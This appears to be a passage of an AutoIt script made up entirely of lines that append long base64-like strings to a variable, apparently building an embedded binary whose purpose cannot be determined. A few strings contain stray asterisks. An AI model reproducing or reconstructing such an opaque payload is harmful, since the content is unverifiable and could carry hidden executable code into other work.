	$bdata &= "CrBwQIOEEPHntQFzBqDongGyI2D9wCET4KFQ+PewwdjAYFB+sfX74ckZolnQohkLwmf8Coe+GodtAPCGtG8fxQkRgCGMElRRCWdOwcAwBMiBviiLwFvuxF73TMfZXsG9PPQaAW7XSxal1WFxVZRfgrxtESBkQMG1OJGvtW/TRrauHKqOQ5sTkqtNPjsrUojiBjEgIEo0cSWiTvf8D6M+BP2LH/0rWNXhR9xUo/cCBQ/wj+FITrcCxCRE8ai8HENWGknt+O4Y6bn8WZ8bnIculiwmaFJQG0NAmwAzmG5MDq9OkXFlNR31fXPE9huqouUiQ42bos7ymCIyAC+Q85WaKDoExWBpVdjcsV/fTIc45vahSHFHHkh8QgAwEDvg4oUwkaiYPEpiAcZvTQlTK9eSNcFAIP8jvLdAyJXiD8KEK7sYe7Zx8bYlWTBZPsV87CqlJM3GwCUyHYHFwoC3rIEBrrDoBrBeNM9D3BbtERuAdlkosH+0SR+JE"
	$bdata &= "nFTe3XFAIK4DZ4yQEGwwoTHXTB+rXDDtgITUoDTJdy3cwoigFHTCn0YDEMvKDDIhMhk5lrxOMSQqsw1MjT68qBwtTvWpuVwO9ySTJK6YLjaO/6B8Q0egMVMpWCBO0Av90DmaBfQD//v7FAvbtXDAw0UO7CNFViUdgKVtHY2YjH5Fq3tRV2okQDmRQID11pp4ADB2Go1Vq28VfgAECSAmw5gwRDAQEhtowjWEUHwiojeGACcP/s64oPD4BRggbI8hPCyAGTghRToQNUrjtgmTPq6yG3rv8DAYIBA9jIJyN5L4AK7+WDPgPFE8dwQAUGLMSitbKChh0KopgM1AKXkb2NJupWrzHn/m9tODDGioLCRBBbLnVw2ak5kIAT2gTEMcH1wa34FD/mkzOaHKFoA8gUJmwpfZGFPRtXxbaNthVRtz+Rz8tomCmtt9MBssO/7CDxghWDyhRWA+ijfZlX1YUJQ77pQXIjVYQUm8wUHpnRE4YDDMe9Yh0"
	$bdata &= "WDMHuKdkkgP5MUACNDmQSQ4DLASZ5EAmJAUcDmSSAwYUByY5kEkMCASBPORACQ/8JAcyyQr0C2CTHMjoDODHkgOZ5A3UDpBJDmTQD8TkQCY5ELwRZJIDmbASqDmQSQ4ToBSbZEIOCxWYMRzIJAcWjBdMciCThBh4BzLJgRlwGpMcyCRkG1iBTHIgHEzqQTXJHUA74OIBY3CrQB4FtYHly59WExDCwJIes5FLnRN07cyQd7ES+C0ImZDbh50z8ALtu6RyV+QkV9gj8l1yOXSjzKhrwGhI8l1CR7jsaZAB+RxOK6xqyXcGZKRup5iDDMh3dnuQFYABGWRgKxZwkolhkBpgIwOCSSZkVARIt+zkwI48t43+NCszIIMMjiySDOxIvqckHHs5GTYggxQ6pwwnkicvhD4R+OX9HEAOIOb96v0G5JCc8BHskYA8OUCSEeQRujbIltgrhRtkYN9kV9CDOcQrDMggAzq4Pjk5IIOsIP6giWOQASSQD"
	$bdata &= "5IJeZMFMoQGkEkmZHgHaGRCJpkIWAlkkgmZRAowmZBJJgsgDA+ZiCYQew0RBBtC1SVu9yLP+wwysCMQ/CvQ9AMyyIDU7LYjB6KT/OQruvwQQQ42ktT/T4ENMrDMK1DAp5MTyclU+7T7+oENMrCoK/ycp5CJZJAAjKeQQQZkhKiAMpGcHKz6bFMgB8gBVFgGkBPJWP/5AHDjOUAEX0jk1YEc2d8QHAeObLVhwgMboLnwreQFG5AzhG8lLxj9G3QzQ8ghqmhVG1gbDiGHkEwbQBs0OYQcQhskGxTkEHIIGwAa9JIJma0z5A6QSSZk2A/IZEImmRC8EWSSCZmwEpyZkEkmE4wUmWRCJnwVaCZkkgkWXBcmmZBJTBhACZlkQhk0SSZkkhooG0ImmZAcHBTJhDxkHRn8HsgkEzLgH8gyIZNMIKghMsmETIwibEzIJBMjUCSQgwOTMDUlV4EXchAUGSSxKEEGpC0qGCxABhmQDDAAOwPyZDQY9D"
	$bdata &= "j/cmCH5AwY7Huo+5BBBnbgK6zYZEAGGbDQtHFyFRjE5bgEhcbGChGKmRAM0haCJLQzyIAMMiioLMggAzKUMIgyIIMMNHg4kG/i0AtCe3CcgZ0cjvpkK5JVcDs1i5b6p/TbNsiAtIJYNkgrGZBBBjo8PgYZCAYsM0LQARlkQEaIsKNjkEroDyB7IAM7OaD5FCukQJ4MyAioF/STAxtkrOj/sPkZkO+S4Fh73CAyyMAGzNMkvAzIIAMorCwHdiSD1Kh7tvgZZGAnoCu6mIFikAG+jNu3DMjJwvjQ3ILABhmQhEh0KyADMshMYFAggwzIUFREyIAMMlgwXMggAzIcYAiCqegMZOto42SQARkAbMS2HNgBFviDVvcqQAYZkOxa5JABGWRe2GKQQQZkzGbAZEAGGWq0bmSQARmocqAHpkEGdpRvevcgbSEnvHqIIAM7OWj2eCtsIIMMyHBwYAcCDDJ0WEt49iBtISewekwgAzs56PVEK+yQkwP"
	$bdata &= "TPEPw9agGGZC2ejiUMAMyyMDTmCicgwzIIBygoHKATCQqLiYHyAEyNsCuorGAMxCDngzs5Lz0ACvAFfABGWRAxOBBBmSQyNDMwAYZkMDQsNsnAzLI1KTYGDAMciDcnLf7Ljk54PSYLE+QexyQkwPO84jS86MJl5yMFvtADsmwkE+EFYDsKBhkaHgbdE8ZkO8MQHtkRG8ZKAZwe7CCUAM7OSD+8kCvAgYZ2CAwKwYgARlkQAoQTwZkkA4AEhTwUA0yIBbgV8EhOTka82QU1IMG5C0DPCrIQE4OhkGwM/JYgLxlQPKCpIMM7OTk8ZQr6ICADDIg7HQgAzLI8GD0IIMMyFT4QDIQDDL8OLcADDIwDCgPBBwDMsiACBQMTA7IIEwIAYEdeVBn3PAT9CtBBmSQ4OjkQAYZkNzoxJABGWTssPCQQQZknPSMZEAGGfh0/MjJARlcAPFIDkyDDAQ0+wjxQNpCTkB6JHAGdnLC7xgrxk5EgBGP/x5k"
	$bdata &= "yCNgQjTQHlxCLZAXHlB/W+zQBj6LdLp7Ir5VqEvCRIOfaEgTsEIEZgSsreQeUK+Z2ELOpRuEnxYEpOQAGt/FpNOkVIdcezwDOzkgwv44K8YrGdggMNMAXPKNUnPbNFQgB8iUVFgqvRoekv5PklfHAeTULljL7v0BhgPI8v0s/nsgE22QKBzThAB5gByIwv3IRHJyvv70GoAcIAceWDmRDHJU2LD85AByALT87vwTyckB6v28RnKAHCBKhEQyyAGAfAPIAeTc++D7GiSDHCAWXAFygExydsnJAeSw+6z8sIAcIBMIDOTJAXJGQhkkA8gpuXKe+qKAHJCT+ijc+qsCGDbY/xyz+e7FqVfjhbwutwwZ2JMBFh38KxrwagIG6KUd1APSUhfJKsR0LziAk/8//7i7HagnC14gHZijCEAOyCQMGAEAOYAcRPlI+QHkAHKC+X765GRLyaL+Kir/qBmQQQYumDK8YAIGjEcdgPICeYEdcB1gsOQXV"
	$bdata &= "mYZABwgugr/+IMe+CmpTI4Y0EK3kgPI3Pfg99KZ2IpbV6+ECqzkAIj+QM4GkPf4Kx1Y86p1cuL8TK9q/d1OFJzb7vZ7QHVpkIEr8jizVLDkyCwYINMesAHkmvae09j2yAUHCNPU96ckTSRHDvj7F9waO8DwgP8e9tNY9qcB5ERyzMb1ySADyMr1BLyAHCATcnZ2KDp5sPWs9x0YezIgTwYeHQwiQE5UDIRz4PQAOYAc5PQe9RYHcHIa9gQbA2Qi+f90YA4gD5BknvSa9ZGcHEC++WAAcgA54PPk8xwgB8geGj4AmUieHPBgA8gD5GSe85qSIweQ9L74F0RADiAn4PLk8gPkABkeGuSiYJA+MP/yQA6QA/Ly5OQAOfP3HEAOkIvx8QPkADny8yAXyZH3HNzxAXKAHPHxmVkHyPL2J8RydhUs//BPFvhEMshEuOw4UTDIkOTvaPDwSl4NE2zwpvCB1TBAw6IbkBPJd2v/2OjvgAwgB+zvJj"
	$bdata &= "DIAXIiRszIAXJR/+/vgBwgB+/w2EVycvTA7v+ADCAH7O4mMsgBciJGtCAHyERobJEcQB6m7qLvTiQnn8bzqOjtMoAcQOztJiAHyAEiRsntRNOgT2jtT5TowiATQFizADkgOBifHA+aMexWp4irxOw5OSBnexzUyOxwkANkIoaKSh50YkyjSOy8klfyTOyG7ILtIbnglabxe0RAjhzYHMx7yOscxA+adHLM6zj7iuu2kgMUG47r0+QLycP2RNMwQA6QiSAkGeQAOV5aKOQAciK26rrqkwPIAfTq8Os5QCaSHExQkAPkAIqGFcs1aRDLcNK4Azs5IN7psCviTg7IIKQc6pgDcnJAGOuMPAYZkJPvhMR4ARlkQMhoJwdkkMxclvBUgAwyIJpIbFAqyJ43K+QFBzEs8xwgkhfICxwQHABE1YGw39eQAxSCvN9g6AEOIAea6Jbpz5InA3JcuhWc5MiBHRv0e9znG+iuSicH4OeQ05oAKVJK/uc"
	$bdata &= "GkAFk5+fokLNXB8f47Csb3M6AnByA7dSEogh4EFv/AHKAYebb8uaPYAHkLOdEdw8kLw+ShITmFIDkAKkI/ubmJpJhA6coCOQAOUAMRgHkRPIT9LTlqZMDyLjl8uXoA6Qg1E/+5YC8DZDlKxvEelXg5JbmuDcbqCJ5eYX/QusT3AaQAWTk5OUBMpHcp7BykpMHyHaw5JwAOUAmHiJyIhnkXFzK45AB5ADO4wgOkIlkSHZ6HoQ7QLQqV3LApjp7Hq8ieXXrAVzjy1jkEF7JK3zoBOlHBW2rDwEfJwIraJIUEZTSduBrGbjJT0QQk1Q+B0wBAsoISeVzIFQCA8uHVKY2ANEEzCabpJuS+AVFzezRyUMqUwHOEIRKJqlMAs/gKXlIZQnQEripYJIHF9HYo0zJJJUG0tAHvU***dPAkQHTLiiORbhHkkWwsGkXFEeTRaTR2OqCXlkCGdEvJYc8WgKcRWkXbJJblNFcRSCTXLCI0V2EXCCTXF58"
	$bdata &= "X5NcIJNwYGQcsjIlBiEDUI5JvpRFIkQZLti0CyNFONEkSS6QSSwlkkkukBwmEEoeUpkD6SX8wXTIbgJFsQTsj7vgmHayRdzrs0WZ5IJNzNG0uAKZ5AK1pOQCmeS2kLeZ5AKZgLhwApnkArlgXXAc8hUFWOt52C6IpkVQvXpFPkcD1gqpBEEGx04gTxV0QgbRQGySLyVFQzDRC+QhF0QP9MkF8pBFEBxGbNoFMiRHRRjRXLBpF0hFDNFJh1wgkwBKJGDTLpDwS0Xg0eSCTbtMRdDRTZnkApnETrQCmeQCT6zkApnkUKBRmeQCmZRSjAKZ5AJTeOQCmeRUaFWZ5AKZXFZUApnkAldI5AKZ5FhAWZnkApksWiDgmOQCWwjrG0IOuVwjXUU27YJN5NFeRdzREGCSC1/Q14IAx14JB0XE1y81Iu0KRQtFJBdskgus0QzIJBfIoA2YF8gkFw6QDyQXyCSIEMgkF8iAEXgFxSQXEmxH7QI55NEHY"
	$bdata &= "NJFMm2IKL3T0UgFMskF1DzJBTLJ1TDWMskFMiTXGAUyyQXYDMgFMsnZANqxE9x4IvSbmQhFIsmX2ujRRZpski8VOUWb0NEXyCQXnMidJBfIJLSeyCQXyKiflBfIJBegiKEkF8gkeKLIJBfIaKNcF8gkF6RMpewF0yRAj2EJRZp2QXU0YWJFKIJNu6BhY0UU0eQCmeRkAGWbdoE8IfBmReDRF2zaBWdF0NFoJBfIJMBpyCQXyLBqnBfIJBdriGwkF8gkfG3IJBfIbG5cF8gkF29UcCQXyCRMccgkF8hAciwXyCQXcyR0JBfIJBx1yCQXyBR2DBfIJBd3BHhOUOghIPjjKQp2Ank3mxMEuQuL0i4YNXO6RTbJt4q9RbvU0Qtkkgu8yJILZJK9vL5kkgtkrL+cC2SSC8CUJzh1yIEMjBdJDcmXkmPReEVKki91Kc9FS8gkF2xk0UxYF8gkF01MTiQXyCRAT8gkF8g0UCig1iQXURhfpWaMnR"
	$bdata &= "EORSVvFR3yRRIfvUVNcGGSE+xn2doEIaZF4DnaRaZNEGLUOdvRxEAmuUDcsLlAJrndoN4muUAmjN98QCa5QOBouUAmueFY4ia5QCZI4zhAJrlA5Ci5QCa55RjmJrlAJgznACAPuUDoHvB2waZd6UXg0epFMskFm9DR67gFMskF7KjJBTLJ7ZjuecgFMojvExBykJUpCKEPEsAKJflSRaIRgk3ypUWjSNHkApnkpCSlm3aBPBH4pkXw0Rds2gWnRdjRqMgFwSQEo6mZ5AJ5ENSq5As27QKri7TRtAtkkqyMrUWQSS7YWNGubKDGQy6vFBzJBPIKnIkTex5474Jj2opFbOuLRdq7dAKrw8HgBgMMCL3taUYEDhBBdgjlTeKvXDlKdEb3wl1Bzfelx+sNHAACBWVsDFjnL/fGnNj6LQ0F9sIBdAPWH73tANDsXnhJJAQ4A4Ewu3ts4FSDkHQLeoxNGFcIoQJfU2wgYSbd8dNNyxDED2whAam"
	$bdata &= "MGzgL2L8QU2wLebYeYcf+CGSYY0COD75DGJ3PSN9+rvyg/U6CD4Sn2f8F9QAAANxHAJ9REItkW1P6C8qDQQz/iUEQqYM8QwIOYUF3B97z/O4D0UgcEIkICEhsDGxNlBBB6dIoIe24HR5Mp7YeHEi5WAVqPFgwKwAtDChVFDpFCM+cWfxFM6REORw87G+eCCwACGoyiEEXi1hBwFYmP1Bq1vY1sEYcUEYkV8ZWOAB9mLvWd40SJzIJDs0P2mqqJP3U/v+87N+/GwzOk2paUrPMakhQqIsIw0ImA/sGrwiYol5MiQIPo4SDpJhIqfgKAExMf1dqGDOAVAtdMXEBIfK73OxHxxZvlkYID4etKSSFgsnEiVAShiFLAZ/PvCyJPv9mkJkjvSWMVMlpk5FS3HG9fFjySB69DL1MukwcEA8ewCYP7XaNLGcBEOwCZsUAdBAj3EELIZTLH5CGnud53hcGUCoEPZeRiud5qnZj/x4k9KA1JKwkSUYD"
	$bdata &= "L/0orAO4AsIEd4zB4I4QRBwfbI20ewGbTEoq2vhnQcqnJwBomwiPwBlBtCq8kTRQcATBESd/6GzhTnDhD46PaqBxd02MhhBI0ATje7VOV1ZOUS/X/qKps+EzHCvO/0MaaTcxFI0sNlcr1bcEJn42VgPGh0FMu/LmIoFCzSvIUSvWUj8GFzR+995WVsc1II0BvBhUMCxmCbq+VChQDW1XoZQOhCKTFABzrZbXwVHkC86S8L8OHC/YhNt5B4IeNDbzWcO2AlwEHIay2gC/zwl/3QS0+HBOQePN0CbeM7AeRxL4b8dhQGI59sMBdTSLdiAJfLc7o2pkUABqN1ZZEJaEmonJDBJrVpx992gFfwC6OxTy7r/AvwAprSAkgDPSPICLQXxl4S3WcDhyJIDYgeNgPJ1oC/t1KzCwDVbudVgm07r9tJfWtgTrBg5UV7lkSe/TxDgaHAYg1TPvK2eJXBpc6Q8RwN+hDPv32V+NFDFeQ/tDpM5QZwwAV"
	$bdata &= "bCLTnnP4OD65ML9z3YQBhSUk+/uGJdddRbzlpYGCscmWlOSCaPdv1B0D6yLjjgmMjTrKGDrecgE0FE257LYhNoeu7wCYLFzaVBAPEUGN+DASVldFFJBGhg8R2xfUEjGIxPfK8CmsPDnGPDawVDAIYRnAGxSQyOXtxPfkgwQFORdFmaPw18nOMQTySMnOAEWbLzqiFh/DH7Zi0MUuOKpJZ0EdETcjXsIjZJWUr+8EIw+vSaFz2OMZa8oBLh/j8vC2cANCo1LCGqklLbQ7wH91Ra+f3wNnlD0fwaKBBAyFJgBqSgcCvk+XMFBEYWPOj+Nfgh9Q7rFoQZej4Wci4WVhDTNYBI+ARMRKI1OLIUjLEVGGBBEkJqAEeMR2hs4ss3qVERDgmLwGWTkYBGFlmkmSOkXgVUswz/iHAA5wYEnUAkTtBhYxawvFBeBrm+PVChZiEG0UGAIL4xcK/kAhcxDPQgah4vsLB4yfhg/J1NIUAHqnqiMWiYIwW"
	$bdata &= "RulmEKFpbw9CxfOFbG3qRytwSMVY13CGEMJOw+e191HU3PElLbmlBVOftDu7C3XptPRJeaWV4GJgFFiF+ipt7olPBZPxNCQtcSW4nVZ2S/gzgCdBgJGItAoQEzJDQBTX8U70VyAwhWgXbLl6AVn1JhiQmC4Ja/XosEdAkbmvjl4KCJJk4kKJucPT+eL5eoJFcQvwaxFygDcOEcuShjsD+O86Vfrx4UBFjfCLMcHIl4U+AMHlFOEhlklUDXXjAW+N7qzyY5KAy+IOAXPE4/YHFmCGWL2EmFOSSM+IlhB1phyxMt63QSHknIBEvUtJc8E77MRgLVoweLkK8VjAuGVkLkNwShiQMmBhavNwWZVoRa/9ggA0x+3wdBOCaoUJgUCDBwtKa5l5NSz4sdo8HTC9ummUhcQEgoYjRRmVuQAkELdUjSxiqMuV8wMIDaGYX/v/+nT/AWpjwS9riciS8y/H8rxzvGfCR0QfSNFDfEkkAFKAR4ur6dglp"
	$bdata &= "AdHUsO/B1jkFBRxSgEww0gLou0UkvtypATQsfiZFCXoH/GDydIXwERTCeiAPsAinwEGawJwhkJcgMbMDVBBqDnyU0ECxgSxjfagXb0CXhLsbr1kUEJbgHXVsgH2h2Hlgyjn0LggNBAoVGI81CKKB5qQ7+tnCMU711B0wQEt3WbTv3DQOAdQw8hma00ElCEGF0xUJCj9NgIVVNezlOLFFhdBT2BESaipYw7ULGSLHen4OFNBb/fQRqD4pWQ4+GIuVXiQwiQ7a5TBB6s5MoEv+CwTQRGlt0EFcSG+ACTxxJGrxJjEiQnG0TKMa6/6TpHqgFPQxYx9MLykTcEBvOiWxNFH0I8dUELsnSdf8/AI0EHmsCd9gci/67c0VW06Ew4mKKDkQ6SgiD6Og2ds6EOf4bCBWA+q7/O+lzEYoeiB+6bQ4gxQTFASx16zs77gL3CfByw0qLxNIr3oL/4NPGB8Z4HhA7SPh/FolIGpj4saFVe8YEERodoBYx"
	$bdata &= "5VHAGxA/Nw++BrMED9RP/usYK8QuoXrSZA5R8ug6qE2ghgLctivwBQVfB+vBC9C+3shRzRUKAw3mRPPCUG9KNRR0vkGUdCPP4P5BKyDUblu7aSo4ZuPDP1ESGPhsWUSBSgoKNWSOXIkL1JEQG9wpYcDASm+ngVBK3k/Yr8MFqIm9BwNBuBGqAPxaM4oGGjY0w6KEMDqQUsDiw0RApAY/C8OrlusiZ1Y0hMB16A/Fm9V0Cis7KOIBH4wbimggAcO/J3gVSjghweA/WVrLCJSldxN4cFF+UHRZSpUbLEFWXRK+Oo1GjwRe3RS1aiBBYOmfSQEd/KWCHVgYkV2lVVIZHAL8VyeXiHQjg3/0ALMDGY+fCSYPjmvmkaUFKq7tIzWJkaelx5h5WdrDkocCUAx9PBMxKEBVkgWgPFE6MARroBHSh1YNUmTpCbQ8ONyCRtKDBQUFBlZTNEePgqkG5ECeAC6WiYFUrnbnGAaVB/YaUokBH1wgJJBIK"
	$bdata &= "geUVV4gZ4Q0GGeVBBYZ3Mo5ezF8JqOBCjgyxxw3pRtNt29wEaEli8N/K2JL30NBATsKNVhyQf/81SBugAEgj4519HRtOXP0Qf3EK5R0BFKLAHCnjQ0316xLTqhgxEYp5ynJEkde5hQjTp9AMFIADr0X5x8SG3jrnwr/EDhwRajwRN4J1wCGBDsDAAHkUYvGXcghjx/CMCg8VQaaAikwDZ0g+VWEYMVcO82QattVqERfW3yKOKRoTHoIJ94DS1PySAGAJC5DKhwg9Er/ygovtyoevDlp9H5majtRabstTLfAdFMvK8FYk6avBtsefkeDOA21Lh4mD0gCew5E2h+xQmxx9Dv1qj3UuUF9i0EbUfwgyr0bDsJ9Dlanpyb0w/2NVgFSUbXR2YSB8p3+coy6qAk3wl0CD4+tGAoe/9Oa1xFEwEjNTJOAOFt1d4vBkMIZBS7+DA0OOcDUniAsfQNBYcggOFyNO0XnKFFKmjCL9OkVuAlhvj/KYK"
	$bdata &= "ioPInYKDk5bBMDNWQQ6L5p+IBH5E76PVC/eNDgaTQ7K1/wqo4tDNYg1m7Nw2uAM2DjRAQL3C2GJgZ6OhwcP+g+IaRXAfU8i9in3fYagtt66yQSk4oDnLyVaBy7eMUAlGdEBfMbjEFkmLcYAFvhX2K+2o00C1KDx+zO3+/u0DTBIB4WadyL+IXtoEmlUKzNVVpYbOkizXNA6BPCOBHMIAy9QQ5eG9G2DAEbLy3sFv7rMM9dBOcorSjV8evWjUeXwcNQUR+vhSgYFo5MGL1AaK6DL/38VVXohIJg8RYiPhSfGTAOFOwNgXxQyK6Tj5X6bgQGKACVo6QLoU5ESow4kDw0SbmQQ+ZfYBQocBS+FQq9qMSrLqysAXgQyGXAgMlyF8faKG8/LECCogs4xlUwNujykb/LCL6Nd9SOFIoQxgt0T5GozYP1Bnw0ZchQJKouYwd2HqROjX1h7esSnQ1RhY5Qiwi2JoUUwzS7MLMi2wN4yHRviVEkIqi"
	$bdata &= "B0e7hSxBXC/uCLDXgJMIRBNJ1NJDChVLAjXwA+xPLuKdIEEbrDYvGHU8KnypOWIH9R5DCkEIqVt4v2P4BO9Z8CRIIK7LRfROD7QFDg/PiH7cPjdr+pEfwTF4VJxP6s4vFTqAJeSggtG76MEg+KjB668E55GLVH/6IXHHDkAtwgrwkjKRw7m6DnCSEDawkiBHEBuZhVxJqOCmchWJxpeXsb4RfD4yqT6sPCqeJ9L9kPJC6BQRPdYUb9lHJwhfwWmfJwlKYgWi6S4QBmItXjnioBuDibKRSHSxN0zRZNFBUMDQ1TdM0WFw4PK16cEOt66smi4wvVjVPEx43qT5TA5+EXhwo/BQLGBjrT4YBLn6IZBokmNI0bJRLAwdHT4T98gVvSQfgePm8RDI1+3ivmsKpfLgUUoW3rqU9qoiTCb3rrZz32rGl3IwxPpBNvJspoYwb3oXjqbUYdA7YNyO2a8UGVsEfGIPv/RLkdcgNx5UBsD3kw+sXQJ4I"
	$bdata &= "lrzPtOFtYfiFNh4ANSk0jTjvgdQxXCgw2+FbyQgxIFk7whKCczTxJH0E8ydto/vK0WADL2g18LpOy2QDYvYObAwYFxRadJ7w0K87zhiEEntE1969dvss6x6L8TD3i9AI0aGYPiB3bcJcdD/IDebtujIaoHIEDETYUl+Ojk5lTGA5+SxIf5hOE4YW9F9EB5/eQPDGTBA5lN2yocrCdBVU/xThDggtaEzsbnlWGy7/3RcGNFcDPO84/jxQhXTSYcWRB8akf1yDGQD5TVd4cCXSrQNobZ+RCRnkwGB0mqIjjdmXtHusnRYuplG88TyhQaKXNFYfi6luujHQ3ISvOFfrARLsJ58sPEg0HWz+BFYugzySVVZVu7sBp6FdUzKNqqCXSW56+GOQfGYCQobfgftrE423np87t3v5wpWOjCScUcjE805QHpTGlPdk4e1RJoyowOznsYmLlNt6kqIexFBbD2iS7HXUFhlWhrzAVFvIjwEUw2Rhu+uFf"
	$bdata &= "KoFF5UAPzKZ4QMGqWR8nEP2NWDDYTN9C8cRMaTJQrGvxG/Eqm2s6wH32xvbBteFgGjEJCnLAHOd6iPblQs5kOccLDAs6xG4kDAKo3dNwecWFJkIUbx5lHCBVzoQSFI1jXWksgsBjXurY9ZeHOrgHUS+E1aUcwkrxAvYwST3VmJ+IlHCaXtwKwZEObwn/HuC+t7IHkg72X4GgACcr0WcK8PISN17D+7SWNTR+SREPDgt2CGM1z9I0fs7yOIxJeTI/kQ72H0CLt6nE+A9hiimdTNGVKIZKeKJ+1BTjfxqKjTYS24pi0gNSCgHTxBef+BQ6wM7N4gvezxSYQhN9zTPiUxQVEgbTAwNUtI4yJDSAM8wHsRkXOFuuJfjPGg22Nt0K/ZBBxSgPsGmxlQA4gBqWr/uctHMMzQwGjgpGzm85tqLwlXIyigkAQRYDMGPM9P0TlAi1IqSQGkDG08CClRwDFgMr0GRIkk7XERg2rgDXpOmHI4sKEjJfO"
	$bdata &= "30JEAyWENEDajcSdEcFzP58JiOMezvWJv4H04Be2FHDDtBSNrxF1siVfmD+gV3CL3BRYM1vaFfvZR5JxiuNEH4ZMgeuXCmxm4sfyjdwzWEGowaBj7K5SSfMShYUlMhOYAD6ciswQAGkxU1wwIrqF7GKvyBQpIDuT10bGki+RqfwvDZOlxgJdARErIHXAmRnxQMIayxYupJvCN5v2A2ZU6tGyqsu3zAkL/zv1c3ILyxksS7NpeTB2UsIKKB/9wb3zEd83TfiQ6JMBq+QY0fjfUiKyI2V78spDkAsb9mMCTOQHIZFCAsT3iWkpH9xIlugTOIBvR83zQ5APFji0skfE7uhbU0UxJhWU/82vCAP7UnwYvSgA9l7n0Fu6OH***aY1GLzSMeAhBVzYv4q4W7t3/odAeZ9/sM6weLxxH4izU3A9q++ldGagTC/9ZXA+vCWxhA2BQRSHBQeAPYiR54BhgMMiXe6ntiCAME7cb75GcQrwwAn8MYNql"
	$bdata &= "Ii9A7Ag+NerB0Foj5N6QbCc3YdAZ88QYKhjjZ/9eqJeyyjQIU62EETGZ90BtQxcy8AYSwu9StLWANZKg7wZAS+74bVgQc7wXxagJRUCfUShBF1SEiLKfXDAaFqIGiQwcQTzjdVzg5kQqwsJbQJ3R5mSV28UQAhPuaJXMPjpsMaCcRj4AsVW3IVqKQxl8fBFcz9kzVYd9JCDphMDswfRMz3ZDOFpo1dOWCEdYRxBP8KtpQOLyANnzS/lfuEMRt/41N3zM0z9P+MCtBCDvwfKBUQu5QzbP5u946EI1B/3QdMAh1EuqBUIkoWDDn3ZxMJcdUkkThgrCbUPJ+Y90vKZ2j9mAf33Xe7NvZyDqdK9CSGStlJN29KY0NquM3dHsvw4NfKzLL3lGN3wBDIBgrYSiBBsHeIwAMLAR+AgAB6whTIj22UHI7Hox1MCcLZ0NaDCUPQkh/w0scR6QamCEBdbGWQmGjKwaxYobfCRIgp38neD97OIySg31d"
	$bdata &= "F2wAuiEFUlDToKbapX5KTGoHiJQ4KML7Sw89rMdGTIFDRIJS1YdAc5k/PFBWlelfOOoCn4wMrvfZ99huwUOEwg+/6K4BcY5giWQLhmgBINWsPR0qbBM4uNxBqGAN9v/owkxjpfZs+R+IK4doVySLUjiLigsnBhTGf9IhXKUaAlQIJiyET3fkCCMB98UMoZ2JIiCCK8ABdaJfaO0BRkdM4lzu2z8iPTCNbAj7bIPtAoNscqmkjDCZb7uEawk6T68tATURIg4G3mqkQ66NM1UNLHXqg1FJNDxaeIhl/Jz3qkQrx2Rf+T4titrvA++D6QIDlDbooejBhkcD2e+MJ07eXBSsKJpg/Nd+ZFBQhf98bbppQMJWGmxQDLqomibE0vpB/BokDAsHm3kowIZMkFAmEef0GtJMH+qGrbg0dNRZDxvA3ejh9/h8oIGzwALCkkIaqjxTB/nB/8O4rAChIYcCY8AAUEsPU0LUEVjoEAmngliWFlF2FzH5E"
	$bdata &= "FzB2BBaERcH2DzJdwCHcrdQmWh0NXXoVksjwkDTIXAvUCGWdNzkyQEcjhLehKxsQcCLrp2IHP/dnmwLyDPSgOGAgPmA84YyLLpGqdE2SOTxHsBI9kzjI8EXjc9SdF78K2/8SPgwXHhUK5BAg8L+w4KVPkArzVwcwQKZNB70huGE5VIlvMFOL8P+EqYsimhnbCVq/qgKUSviSMNPnlb1GsO8bLpsP3AGdESP9y6iURB86d1onOGJF2GUNUApBG9x85REstPBLzkRUYVAQMA46qVyTG88dMJj/NQ7gkFCp6DddlRQxA7j7woHUBwpNsE7TQcgoNvFNsVEpTAw0Ad9cffaCBvSeQvGxAtuJvO2w9pTzvLipnBSUI8AA3u07xzgE88OSZyM0FL64iQZg1YnKPdVHBkdHKMI2BeECXc8kuH4go1PLGBBCJMqC266GMgkTPptYFsErHBSUz7dEcYPEwKm9ujUQEXDZQorPAXnk65UmKXQ7AFgTH"
	$bdata &= "A45EUdlK3xHYMy/9NqMbYOODcPp9dAVuY4ARQsMoABv/hsi1E4/An4LTwVGCRT1yj4hYgEHULoK6k4KTbxyd8cts166oWcTxwrxar/laWfoxTt0fsD3QPTAzfyF24YjVQBAjT9k7hoXGOMjYk3/ZOGRaGTPHQdeBzc7kOsIskIUcCU+5kbq2jBtTQCEh3xagNiehsMBTmDgGawYxlXSrQHgrUxJ6U8FKGb0Z1Cb5Jcvg8Xi1Lww4DYLVv8NvTHIodtDbH2BVA9gLG0m9zC+xaxn2J01DAFA+LAPEfC3BTGa6/D6wmzQf8/FARPpi0xAZUwWltQhHNhqlZQuMwMngevboMf/1S2KQtKqAPwtYwfC1LyDA0AIEHJjVcnoAvUZE85+OfCgMHjBAvD9oB6aHCCh6FQciv33n+JcA2XUZMAAlZSwEIrDwSkiaxL6UYg+DScPFeHUFApDiHRYZlvo+1TN0+Hp5zYbNXohUXTaveM94HsJPTAAIH"
	$bdata &= "EuBRBtoACUj/EBumCOZKgtBXQAZWneNjEi0uDRDorrR+rk2xzBxh86suJf8wLwAviSJMffvQk5C5M0IHiOzp/V1J4dHx+Pg+MwiI7zw+NBfz2u7qBRlSNBIiLHih1CTtQBMqg2s6bwQE+fNRSEmmlfMJGtzw0iliAl4JM1UmqC615N5ZOgzbrYvhb0BjYDk++LLx1S+ofN1agAC9zRyeL7woe/kggA0gYOYzbeGdkL1PEwAj7AnIErLTFD0E7aF47ilDMKAxUIQXjd1GRWLuMh41ZLwjkQTzXaK8sKfuOdSR9rCA7tAJDBZEA2da7ehR9J27hIrvmdBO5rIRpC+OJcF4KFMaFJhREglXHRpgH/HINIxyepHL04Gwd4GiIvA7AApAlDbMg5WlR4sArCYylHGwA1KlL4y72UEqcxgWUd78MlFO8hSFOuruaDjQfZxkjAB7anJyVAzi7qt30qCJ4pDNDA9BQLvTf9J40sEC3FJA0HdrisdC1"
